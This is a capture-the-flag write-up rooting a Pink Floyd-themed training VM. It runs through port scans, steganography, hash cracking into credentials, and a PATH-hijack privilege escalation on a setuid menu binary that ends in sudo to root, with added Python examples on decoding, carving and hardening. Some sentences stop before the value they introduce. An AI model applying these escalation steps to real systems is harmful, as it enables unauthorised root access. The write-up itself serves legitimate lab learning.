In 1965, one of the most influential bands of our times was formed... Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd's contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.
Your challenge is simple... set your controls for the heart of the sun, get root, and grab the flag! Rock on!
Xerubus asked if I would like to beta-test this VM prior to release and being a bit of a (closet) Pink Floyd fan, I jumped at the opportunity. So obviously the first stage in any boot2root is to port scan the sucker.
```
[email protected]:~$ nmap -n -sT 192.168.56.104

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-02 19:52 GMT
Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for 192.168.56.104
Host is up.
All 1000 scanned ports on 192.168.56.104 are filtered
```
Straight up trolled already. I fired up Wireshark and after a minute or so saw a boatload of ARP requests coming from The Wall, looking like an ARP scan.
Digging past the ARPs, I found a TCP packet destined for my IP on port 1337.
It looks like this is running on a cron job, so I set up a netcat listener to catch the connection.
```
[email protected]:~$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.104] 21840

[ASCII-art banner]

The Wall by @xerubus

-= Welcome to the Machine =-

If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet.
- Pink Floyd, The Thin Ice
```
Ok… brilliant, now what?
Well if you port scan the VM for a second time, it appears to have opened up a port.
```
[email protected]:~$ nmap -n -sT 192.168.56.104

PORT   STATE SERVICE
80/tcp open  http
```
There is nothing to see on the page, with the exception of this image.
In the HTML source, there is also the following:
```
If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise.
- Pink Floyd, The Wall

Did you know?
The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the riddle, and further claimed that there was an enigma hidden within the artwork.

737465673d3333313135373330646262623337306663626539373230666536333265633035
```
That string is totally hex, which we can decode like so (Python 2 shown; in Python 3 the equivalent is `bytes.fromhex(string).decode()`):
```
>>> string = '737465673d3333313135373330646262623337306663626539373230666536333265633035'
>>> string.decode('hex')
'steg=33115730dbbb370fcbe9720fe632ec05'
```
steg is a pretty solid clue, and probably relates to the image on the web page. The other string is an MD5 hash and can be cracked pretty easily - it turns out to be
So let's download pink_floyd.jpg and run it through some steg tools.
```
[email protected]:~/Downloads$ steghide extract -sf pink_floyd.jpg
Enter passphrase:
wrote extracted data to "pink_floyd_syd.txt".
[email protected]:~/Downloads$ cat pink_floyd_syd.txt
Hey Syd,

I hear you're full of dust and guitars? If you want to See Emily Play, just use this key:
U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0

Roger

Did you know?
In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in his collection.
```
So we have a new base64 and MD5 string.
```
[email protected]:~/Downloads$ echo -en 'U3lkQmFycmV0dA==' | base64 -d
SydBarrett

f831605ae34c2399d1e5bb3a4ab245d0 == pinkfloydrocks
```
So we have what looks like a set of credentials: SydBarrett:pinkfloydrocks. But where to use them?
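The two clue formats seen so far (`steg=<md5>` from the HTML source and `<base64>|<md5>` from the steghide payload) follow the same shape: a label plus a 32-character MD5 digest. The following is an added example, not code from the original post or from the VM, that decodes both, validates the digest shape, and checks a candidate word against a hash the way a dictionary crack would. The wordlist is constructed here for illustration; only the hash-to-word mechanism is shown, and the page's own `pinkfloydrocks` match is printed, not assumed.

```python
import base64
import binascii
import hashlib
import re

MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed copies of the two strings found on the box.
HTML_HEX = "737465673d3333313135373330646262623337306663626539373230666536333265633035"
STEG_NOTE = "U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0"


def decode_hex(s):
    """Hex-decode a string into ASCII text; raises ValueError on bad input."""
    try:
        return bytes.fromhex(s.strip()).decode("ascii")
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValueError(f"not plain-ASCII hex: {exc}") from exc


def parse_clue(text):
    """Split a 'key=md5' or 'base64|md5' clue into (label, md5hex).

    Returns None when the text matches neither layout or the hash part
    is not 32 lowercase hex characters (i.e. not MD5-shaped).
    """
    text = text.strip()
    if "|" in text:
        b64, _, digest = text.partition("|")
        try:
            label = base64.b64decode(b64, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            return None
    elif "=" in text:
        label, _, digest = text.partition("=")
    else:
        return None
    digest = digest.strip().lower()
    return (label, digest) if MD5_RE.match(digest) else None


def md5_hex(word):
    """MD5 digest of a word as lowercase hex (MD5 is fine for CTF clues, not for passwords)."""
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(digest, wordlist):
    """Return the first wordlist entry whose MD5 equals digest, else None."""
    digest = digest.lower()
    for word in wordlist:
        if md5_hex(word) == digest:
            return word
    return None


if __name__ == "__main__":
    print(decode_hex(HTML_HEX))            # steg=33115730dbbb370fcbe9720fe632ec05
    label, digest = parse_clue(STEG_NOTE)  # ('SydBarrett', 'f831605a...')
    # Constructed mini wordlist; the post reports the second hash cracks to 'pinkfloydrocks'.
    print(label, crack_md5(digest, ["password", "pinkfloyd", "pinkfloydrocks"]))
```

Unsalted MD5 is exactly why a dictionary lookup works here; the same check with a salted, slow hash (bcrypt, scrypt, Argon2) would not be feasible for a casual wordlist.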
I was stuck here for a while, but if we do a ‘wider’ port scan, we find that port 1965 is open.
```
[email protected]:~$ nmap -n -sT -p- 192.168.56.104

PORT     STATE SERVICE
80/tcp   open  http
1965/tcp open  unknown
[email protected]:~$ nc 192.168.56.104 1965
SSH-2.0-OpenSSH_7.0
Protocol mismatch.
```
SSH - so maybe we can SSH in as Syd.
```
[email protected]:~$ ssh SydBarrett@192.168.56.104 -p 1965
SydBarrett@192.168.56.104's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.56.104 closed.
```
Ok, SFTP it is. Let’s connect and see if we can find any interesting files.
```
[email protected]:~$ sftp -P 1965 SydBarrett@192.168.56.104
SydBarrett@192.168.56.104's password:
Connected to 192.168.56.104.
sftp> ls -la
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 .mail
-rw-r--r--    1 0        1000         1912 Oct 25 22:56 bio.txt
-rw-r--r--    1 0        1000       868967 Oct 24 16:17 syd_barrett_profile_pic.jpg
sftp> ls -la .mail/
drwxr-xr-x    2 0        1000          512 Nov 11 10:25 .stash
-rw-r--r--    1 0        1000          309 Oct 24 18:18 sent-items
sftp> ls -la .mail/.stash/
-rw-r--r--    1 0        1000     48884479 Aug  7 14:33 eclipsed_by_the_moon
sftp> get .mail/sent-items
Fetching /.mail/sent-items to sent-items
sftp> get .mail/.stash/eclipsed_by_the_moon
Fetching /.mail/.stash/eclipsed_by_the_moon to eclipsed_by_the_moon
```
```
[email protected]:~$ cat sent-items
Date: Sun, 24 Oct 1965 18:45:21 +0200
From: Syd Barrett <[email protected]>
Reply-To: Syd Barret <[email protected]>
To: Roger Waters <[email protected]>
Subject: Had to hide the stash

Roger... I had to hide the stash. Usual deal.. just use the scalpel when you find it.

Ok, sorry for that.

Rock on man

"Syd"
```
scalpel is a clue here.
```
[email protected]:~$ file eclipsed_by_the_moon
eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 00:15:47 2015, from Unix
```
After we extract the content, we find it’s actually a disk image.
```
[email protected]:~$ file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)
```
It won't boot, so we go back to our scalpel clue. Scalpel is a file-carving tool: it recovers deleted files from a raw image by scanning for known header and footer byte signatures rather than walking the filesystem, so let's see if we can recover anything. The first step is to edit /etc/scalpel/scalpel.conf and uncomment the file types you want to look for.
```
[email protected]:~$ scalpel eclipsed_by_the_moon.lsd

jpg with header "\xff\xd8\xff\xe0\x00\x10" and footer "\xff\xd9" --> 1 files

Scalpel is done, files carved = 1, elapsed = 0 seconds.
```
A new directory is created, scalpel-output, within which is a recovered image.
So now we have the password for RogerWaters, hello_is_there_anybody_in_there. Let's try and connect via SSH this time.
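To make the carving step concrete, here is an added example (not part of the original post and not scalpel's own code) of the same header/footer carve that scalpel's jpg rule performs, applied to a constructed byte buffer standing in for the FAT image. The sample image and the size cap are assumptions; the header and footer bytes are the ones scalpel reported above.

```python
import os

JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10"   # JFIF SOI + APP0 marker, as in the scalpel.conf jpg rule
JPEG_FOOTER = b"\xff\xd9"                   # JPEG EOI marker
MAX_JPEG = 20 * 1024 * 1024                # assumed cap, like scalpel's per-type size limit


def carve_jpegs(data, header=JPEG_HEADER, footer=JPEG_FOOTER, max_size=MAX_JPEG):
    """Return a list of (offset, blob) for every header..footer span in data.

    Like scalpel, this ignores the filesystem entirely and scans the raw
    bytes, so a deleted file whose clusters are still intact is recovered.
    A header with no footer within max_size bytes is skipped.
    """
    found = []
    pos = 0
    while True:
        start = data.find(header, pos)
        if start == -1:
            break
        end = data.find(footer, start + len(header), start + max_size)
        if end == -1:
            pos = start + 1
            continue
        end += len(footer)
        found.append((start, data[start:end]))
        pos = end
    return found


def write_carved(found, outdir):
    """Write each carved blob to outdir, numbered like scalpel-output does."""
    os.makedirs(outdir, exist_ok=True)
    paths = []
    for i, (_offset, blob) in enumerate(found):
        path = os.path.join(outdir, f"{i:08d}.jpg")
        with open(path, "wb") as fh:
            fh.write(blob)
        paths.append(path)
    return paths


def build_sample_image():
    """Constructed stand-in for the disk image: zero filler with two JPEG-like blobs."""
    filler = b"\x00" * 512
    fake_jpeg1 = JPEG_HEADER + b"JFIF\x00 picture one " * 8 + JPEG_FOOTER
    fake_jpeg2 = JPEG_HEADER + b"JFIF\x00 picture two " * 3 + JPEG_FOOTER
    return filler + fake_jpeg1 + filler * 3 + fake_jpeg2 + filler


if __name__ == "__main__":
    image = build_sample_image()
    for offset, blob in carve_jpegs(image):
        print(f"jpeg at offset {offset}, {len(blob)} bytes")
    print(write_carved(carve_jpegs(image), "carve-output"))
```

The caveat a forensic practitioner would add: footer-based carving stops at the first `\xff\xd9` it sees, so a JPEG with an embedded thumbnail (which carries its own EOI marker) comes out truncated, and a stray footer in unrelated data produces a bogus file. That is why scalpel caps sizes per type and why carved output is always verified with `file` or an image viewer afterwards.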
```
[email protected]:~$ ssh RogerWaters@192.168.56.104 -p 1965
RogerWaters@192.168.56.104's password:
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

[ASCII-art banner]

$
```
After some standard Linux enumeration, we get a list of all users on the system. It’s logical to assume that we will have to progress through each user before reaching root.
```
SydBarrett:*:1000:1000:Syd Barrett:/home/SydBarrett:/sbin/nologin
NickMason:*:1001:1001:Nick Mason:/home/NickMason:/bin/ksh
RogerWaters:*:1002:1002:Roger Waters:/home/RogerWaters:/bin/ksh
RichardWright:*:1003:1003:Richard Wright:/home/RichardWright:/bin/ksh
DavidGilmour:*:1004:1004:David Gilmour:/home/DavidGilmour:/bin/ksh
```
If we have a look for SUID and/or SGID files, we find two interesting binaries.
```
$ find / -perm -4000 -print 2> /dev/null
/usr/local/bin/brick
/usr/local/bin/shineon
$ ls -l /usr/local/bin/brick
-rws--s--x  1 NickMason  NickMason  7291 Aug  8 00:33 /usr/local/bin/brick
$ ls -l /usr/local/bin/shineon
-rwsr-s---  1 DavidGilmour  RichardWright  7524 Oct 25 07:58 /usr/local/bin/shineon
```
We don't have the privileges to execute shineon yet, so let's look at brick.
```
$ /usr/local/bin/brick

What have we here, laddie? Mysterious scribbings? A secret code? Oh, poems, no less! Poems everybody!

Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ id
uid=1001(NickMason) gid=1001(NickMason) groups=1002(RogerWaters)
$ whoami
NickMason
```
In each home directory thus far, there has been a profile picture of the band member. Nick's, however, is something else in disguise.
```
$ file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, created by: Xiph.Org libVorbis I
```
Listening to the track, you will notice some Morse code. You can decode it by ear, or load the spectrogram in an audio editor and do it visually.
The string we eventually come out with is
```
$ su RichardWright
Password:
ksh: Cannot determine current working directory
$ id
uid=1003(RichardWright) gid=1003(RichardWright) groups=1003(RichardWright)
```
Now we are Richard Wright, we can go back to the shineon binary we found previously.
```
$ /usr/local/bin/shineon

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
```
Trying out these functions, we can see that they execute pre-defined shell commands. If we run strings on the binary, we can see that all but one are called with an absolute path: the Check Mail option runs a bare mail, which is resolved through whatever PATH the caller supplies.
```
$ strings /usr/local/bin/shineon
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail
```
```
$ cp /bin/ksh /tmp/mail
$ export PATH=/tmp:$PATH
$ /usr/local/bin/shineon

Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
```
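The root cause is a setuid binary resolving `mail` through the caller's PATH. As an added example (not code from the VM or from shineon itself), the following Python contrasts that PATH lookup with what a hardened launcher does: map menu choices to absolute paths from a fixed allowlist and hand the child a scrubbed environment, so nothing the invoking user controls decides which program runs. The `/usr/bin/mail` entry and the SAFE_COMMANDS table are assumptions for illustration; the other three paths are the ones strings showed.

```python
import os
import shutil
import stat
import tempfile

# Assumed allowlist a hardened version of the menu would use. Paths for cal, who
# and ping come from the strings output above; /usr/bin/mail is an assumption.
SAFE_COMMANDS = {
    "cal": "/usr/bin/cal",
    "who": "/usr/bin/who",
    "ping": "/sbin/ping",
    "mail": "/usr/bin/mail",
}
# Environment the privileged child should get instead of the caller's.
SAFE_ENV = {"PATH": "/bin:/usr/bin:/sbin:/usr/sbin", "IFS": " \t\n"}


def resolve_untrusted(name, path_env):
    """What system('mail') or execvp effectively does: first match along the caller's PATH."""
    return shutil.which(name, path=path_env)


def resolve_hardened(name):
    """Ignore the environment entirely; only allowlisted absolute paths may run."""
    try:
        return SAFE_COMMANDS[name]
    except KeyError:
        raise ValueError(f"command {name!r} is not in the allowlist") from None


def hardened_argv_env(name, *args):
    """argv and a scrubbed environment suitable for os.execve / subprocess.run(env=...)."""
    return [resolve_hardened(name), *args], dict(SAFE_ENV)


def demo_path_hijack():
    """Plant a fake 'mail' in a temp dir, put that dir first in PATH, compare resolutions.

    Returns (untrusted_result, hardened_result, planted_path). The fake script is
    never executed; only the lookup is demonstrated.
    """
    with tempfile.TemporaryDirectory() as tmp:
        planted = os.path.join(tmp, "mail")
        with open(planted, "w") as fh:
            fh.write("#!/bin/sh\necho this would run with the setuid owner's privileges\n")
        os.chmod(planted, os.stat(planted).st_mode | stat.S_IXUSR)
        caller_path = tmp + os.pathsep + "/usr/bin" + os.pathsep + "/bin"
        untrusted = resolve_untrusted("mail", caller_path)
        hardened = resolve_hardened("mail")
        return untrusted, hardened, planted


if __name__ == "__main__":
    untrusted, hardened, planted = demo_path_hijack()
    print("PATH lookup chose:   ", untrusted)   # the planted file in the temp dir
    print("allowlist chose:     ", hardened)    # /usr/bin/mail regardless of PATH
    print("hardened launch:     ", hardened_argv_env("mail"))
```

In a C setuid program the same idea is `execve("/usr/bin/mail", argv, safe_envp)` instead of `system("mail")`; dropping the setuid bit in favour of a narrowly scoped sudoers rule is the other common fix. The `sudo -l` output later in this write-up shows the opposite extreme, `SETENV: ALL`, where the environment is deliberately left in the caller's hands.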
In his home directory is a file called anotherbrick.txt:
```
$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine.
- Pink Floyd, Shine On You Crazy Diamond

New website for review:
pinkfloyd1965newblogsite50yearscelebration-temp/index.php

# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in.
- Pink Floyd, Dogs
```
If we head over to this new directory, we get the following page:
As before, there is a clue in the HTML source.
```
Through the window in the wall, come streaming in on sunlight wings, a million bright ambassadors of morning.
- Pink Floyd, Echoes

Can you see what the Dog sees? Perhaps hints of lightness streaming in on sunlight wings?
```
Download homepageimg.jpg and have a close look around where the dog is sitting. You can just make out some black text.
To get a better look at this, I simply messed around with the brightness and contrast levels.
We can't navigate to \welcometothemachine in a browser.
```
403 Forbidden
OpenBSD httpd
```
If we have a look on the actual VM:
```
$ ls -l /var/www/
drwxr-x---  4 www  welcometothemachine  512 Nov 27 01:47 htdocs
$ ls -l /var/www/htdocs/
ls: /var/www/htdocs/: Permission denied
```
Even though we are effectively DavidGilmour, who is in the correct group, our current privileges don't reflect that: the setuid binary only changed our effective uid, and our supplementary group list is still RichardWright's. And on BSD apparently you can't just run newgrp.
```
$ cat /etc/group
welcometothemachine:*:1005:DavidGilmour
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
$ newgrp welcometothemachine
mail: newgrp: not found
```
So we have to find another way of inheriting DavidGilmour's group privs. We can do just that with his password, which we find hidden in david_gilmour_profile_pic.jpg.
```
$ strings david_gilmour_profile_pic.jpg
who_are_you_and_who_am_i
$ su DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)
```
Now we can get into the directory.
```
$ ls -l /var/www/htdocs/welcometothemachine/
total 16
-rws--s---  1 root  welcometothemachine  7513 Nov 27 01:47 PinkFloyd
$ ./PinkFloyd

Please send your answer to Old Pink, in care of the Funny Farm.
- Pink Floyd, Empty Spaces

Answer:
```
If we recall the other string, 50696e6b466c6f796435305965617273, this is more hex which we can decode (Python 2 shown; in Python 3 use `bytes.fromhex(string).decode()`).
```
>>> string = '50696e6b466c6f796435305965617273'
>>> string.decode('hex')
'PinkFloyd50Years'
```
Maybe this is the correct answer?
```
$ ./PinkFloyd

Please send your answer to Old Pink, in care of the Funny Farm.
- Pink Floyd, Empty Spaces

Answer: PinkFloyd50Years

Denied.... If I had my way, I'd have all of ya shot.
- Pink Floyd, In The Flesh
```
Nope, ok… After a while, I just shoved the raw hex in.
```
$ ./PinkFloyd

Please send your answer to Old Pink, in care of the Funny Farm.
- Pink Floyd, Empty Spaces

Answer: 50696e6b466c6f796435305965617273

Fearlessly the idiot faced the crowd smiling.
- Pink Floyd, Fearless

Congratulations... permission has been granted. You can now set your controls to the heart of the sun!
```
"permission has been granted" is a little cryptic. It took me a while to realise it had given DavidGilmour sudo rights.
```
$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User DavidGilmour may run the following commands on thewall:
    (ALL) SETENV: ALL
```
So now we can just elevate, no problem.
```
$ sudo -i
# whoami
root
```
Grab the flag.
```
# cat /root/flag.txt

"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink?
- Pink Floyd, Have A Cigar"

Congratulations on rooting thewall!

[ASCII art: The Wall]

Celebrating 50 years of Pink Floyd!
Syd Barrett (RIP), Nick Mason, Roger Waters, Richard Wright (RIP), and David Gilmour.

** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"

-=========================================-
- xerubus (@xerubus - www.mogozobo.com) -
-=========================================-
```
It was also nice to read through the contents of /root/scripts/ to see how the VM works.
Many thanks to xerubus, and thanks for letting me beta-test :)